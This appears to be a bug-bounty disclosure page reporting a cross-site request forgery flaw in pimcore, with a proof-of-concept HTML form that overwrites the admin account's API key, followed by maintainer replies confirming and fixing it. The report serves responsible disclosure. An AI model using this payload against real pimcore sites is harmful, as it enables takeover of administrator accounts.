Cross-Site Request Forgery (CSRF) in pimcore/pimcore


Reported on

Jul 25th 2021

✍️ Description

Your application have not any CSRF protection and also You set the SameSite attribute to Lax, this means if you want to alter some data with GET HTTP requests, then your site should be vulnerable to CSRF attacks with no doubt.

First you run this Html payload and then you should see that the admin's API altered to following key : 63e2f50d60d3412c407703cf16bc34265cf15ae1bd302ed7351fff4afe4a5b12

🕵️‍♂️ Proof of Concept

// PoC.html

  <script>history.pushState('', '', '/')</script>
    <form action="">
      <input type="hidden" name="xaction" value="update" />
      <input type="hidden" name="&#95;dc" value="" />
      <input type="hidden" name="data" value="&#123;&quot;id&quot;&#58;1&#44;&quot;name&quot;&#58;&quot;admin&quot;&#44;&quot;firstname&quot;&#58;null&#44;&quot;lastname&quot;&#58;null&#44;&quot;email&quot;&#58;null&#44;&quot;apiKey&quot;&#58;&quot;63e2f50d60d3412c407703cf16bc34265cf15ae1bd302ed7351fff4afe4a5b12&quot;&#44;&quot;image&quot;&#58;&quot;&#47;admin&#47;user&#47;get&#45;image&#63;id&#61;1&quot;&#125;" />
      <input type="submit" value="Submit request" />

I test this Payload on both stable and dev Editions.(on demo sites)

💥 Impact

This vulnerability is capable of take control of any user's account.


a year ago


Hey amammad, just contacted pimcore re: this report. Waiting to hear back, good job!

a year ago


Hi dear pimcore team, if you want more help just tell me.

Bernhard Rusch
a year ago


@amammad thanks!

Bernhard Rusch validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch confirmed that a fix has been merged on 8aa0ca a year ago
Bernhard Rusch has been awarded the fix bounty
Bernhard Rusch
a year ago

Maintainer fixes the problem as well.

to join this conversation